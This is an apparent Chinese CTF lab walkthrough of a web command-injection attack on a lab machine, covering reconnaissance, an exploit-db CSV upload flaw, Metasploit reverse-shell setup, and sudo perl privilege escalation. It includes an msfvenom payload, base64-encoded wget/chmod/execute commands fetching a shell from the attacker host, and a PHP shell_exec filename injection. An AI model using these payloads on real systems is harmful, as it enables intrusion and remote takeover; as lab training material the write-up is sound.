CTF-18.web安全命令注入

实验环境

攻击机: 192.168.1.106
靶场机器: 192.168.1.104

信息探测

扫描主机服务信息以及服务版本

  • nmap -sV 靶场IP地址

在这里插入图片描述

快速扫描主机全部信息

  • nmap -T4 -A -v 靶场IP地址
    探测目录信息

  • nikto -host http:/ /靶场IP地址端口
    在这里插入图片描述

  • dirb htp://靶场IP地址端口
    在这里插入图片描述
    打开robots.txt:
    在这里插入图片描述
    尝试打开这五个界面:
    在这里插入图片描述

在这里插入图片描述
此界面源代码如下:
在这里插入图片描述

接下来对其他敏感信息进行挖掘
在这里插入图片描述
打开浏览器之后发现一个压缩包,将其下载:
在这里插入图片描述
然后在网页上发现打开这个压缩包需要密码:
在这里插入图片描述
使用前面发现的密码进行尝试,解压成功,但需要通过file命令进行查看,为何种类型的文件
在这里插入图片描述
复制url进行打开:
在这里插入图片描述
使用前面发现的5个密码进行尝试。登陆到后台的界面:
在这里插入图片描述
登录-利用exploitdb
利用挖掘到的用户名和密码登陆系统,然后对系统是否使用某种CMS、SMS等进行查看 。
利用现成的EXP进行渗透。

渗透测试技巧
使用searchsploit来查看系统是否有对应漏洞

searchsploit 对应的系统

在这里插入图片描述

在这里插入图片描述
使用cat命令进行查看或者也可使用这个网页进行查看漏洞信息
https:/ /www.exploit-db.com/exploits/42003/
在这里插入图片描述
发现存在上传漏洞,在网页中打开上传位置
在这里插入图片描述
发现send from file,可以上传文件
在这里插入图片描述
这里提示上传csv文件,touch 1.csv
在这里插入图片描述
在这里插入图片描述
上传成功:
在这里插入图片描述
打开burpsuite
在这里插入图片描述
使用burpsuite,需要先设置浏览器的代理,
在这里插入图片描述
在网页中重新上传文件,burpsuite中会出现对应的数据报
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

准备shell

启用metasploit监听

msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter_reverse_tcp.
msf exploit(handler) > set lhost 192.168.1.106
msf. exploit(handler) > set lport 4444
msf. exploit(handler) > run

在这里插入图片描述
在这里插入图片描述
exploit开始监听
在这里插入图片描述

生成shell
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=1 92.168.1.106 lport =4444 -f elf >
/var/www /html/shell
在这里插入图片描述
在这里插入图片描述

绕过防火墙 上传shell

利用base64绕过防火墙检测

-- service apache2 start
-- echo 'wget http:/ /攻击机IP地址/shell -O /tmp/shell' | base64
-- echo 'chmod 777 /tmp/shell' | base64
-- echo '/tmp/ shell' | base64

在这里插入图片描述
在这里插入图片描述
获取反弹shell,不断的上传csv文件,然后用burpsuite截断,并修改信息
使用burpsuite 修改filename参数内容
–“<?php shell_exec(base64_decode("前面加密的信息')); die();?> .php”
在这里插入图片描述
查看kali终端的监听效果:
在这里插入图片描述

提升权限、获取Flag

登录服务器之后,反弹的shelI的用户是www-data。并不具备roor权限。
使用sude.-I查看www-data用户的sudo权限;
根据提示执行以下命令(现实渗透中,肯定存在这样的问题。程序员为了方便,便设置了不需要密码
就可以执行sudo的操作)
– sudo perl -e "exec ‘/bin/sh’”
– bash -i
在这里插入图片描述

查看flag值
cat flag
在这里插入图片描述
.

总结:

上传webshell获取控制权
使用burpsuite绕过上传过滤机制,绕过前端检测机制,或%00截断绕过;
执行shell,获取反弹shell.

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wow2ok

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值